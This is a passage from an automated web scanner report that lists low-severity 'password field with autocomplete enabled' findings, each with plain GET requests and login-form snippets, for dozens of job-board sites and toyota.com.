<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.intellectualpropertycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.73. http://www.internshipcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.internshipcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.74. http://www.j2eecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.j2eecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.75. http://www.journalismcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.journalismcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.76. http://www.lawcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=h9gb6ofdn09dkbjophfsddmto3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211204

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
      <input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
  <input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.77. http://www.lawcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

Response

11.78. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6070/Brooklyn-Law-School/

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.79. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6154/Anne-Healy-LIDS/

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.80. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.81. http://www.lawcrossing.com/lcjssearchresults.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/lcjssearchresults.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.82. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The page contains a form with the following action URL:

http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.83. http://www.lawschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lawschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.lawschoolloans.com/

The form contains the following password field with autocomplete enabled:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.84. http://www.logisticscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.logisticscrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.85. http://www.managercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.managercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.86. http://www.manufacturingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.manufacturingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.87. http://www.marketingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.marketingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.88. http://www.mediajobcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.mediajobcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.89. http://www.medicalschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.medicalschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.medicalschoolloans.com/index.php

The form contains the following password field with autocomplete enabled:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.90. http://www.militarycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.militarycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.91. http://www.nursingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.nursingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.92. http://www.occupationaltherapycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.occupationaltherapycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.93. http://www.operationscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.operationscrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.94. http://www.parttimecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.parttimecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.95. http://www.pharmaceuticalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.pharmaceuticalcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.96. http://www.physicalsecuritycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.physicalsecuritycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.97. http://www.physicaltherapycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.physicaltherapycrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.98. http://www.planningcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.planningcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.99. http://www.postdoctoralfellowcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.postdoctoralfellowcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.100. http://www.prcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.prcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.101. http://www.preferredresumes.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.preferredresumes.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.preferredresumes.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.102. http://www.procurementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.procurementcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.103. http://www.productmanagercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.productmanagercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.104. http://www.projectmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.projectmanagementcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.105. http://www.publicinterestcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.publicinterestcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.106. http://www.publishingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.publishingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.107. http://www.purchasingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.purchasingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.108. http://www.qaqccrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.qaqccrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.109. http://www.radiocrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.radiocrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.110. http://www.realestateandlandcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.realestateandlandcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.111. http://www.recruitingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.recruitingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.112. http://www.researchingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.researchingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.113. http://www.resumeboomer.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resumeboomer.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.resumeboomer.com/?utm_source=JDJ&utm_medium=Banner&utm_campaign=blast-300x250\

The form contains the following password field with autocomplete enabled:

password

Request

GET /?utm_source=JDJ&utm_medium=Banner&utm_campaign=blast-300x250\ HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=m9qik3c52objld7u33gc65u833; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<form action="#" method="post" name="resumelogin1">
<div style="font-size:20px; font-weight:bold; padding-left:100px; padding-top:10px;">
...[SNIP]...
<td><input type="password" id="password" name="password" class="input_text" value="Password" onFocus="onfocusval('password','Password')" onBlur="onblurval('password','Password')" /></td>
...[SNIP]...

11.114. http://www.resumeboomer.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resumeboomer.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.resumeboomer.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.115. http://www.retailcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.retailcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.retailcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.116. http://www.sciencescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.sciencescrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.117. http://www.scientistcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.scientistcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.118. http://www.sellingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.sellingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.119. http://www.sqlcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.sqlcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.120. http://www.teenagercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.teenagercrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.121. http://www.telecomcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.telecomcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.122. http://www.toyota.com/owners/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/owners/

Issue detail

The page contains a form with the following action URL:

http://www.toyota.com/owners/apps/login_precheck.do

The form contains the following password field with autocomplete enabled:

password

Request

Response

11.123. http://www.tradingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.tradingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.124. http://www.trainingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.trainingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.125. http://www.transportationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.transportationcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
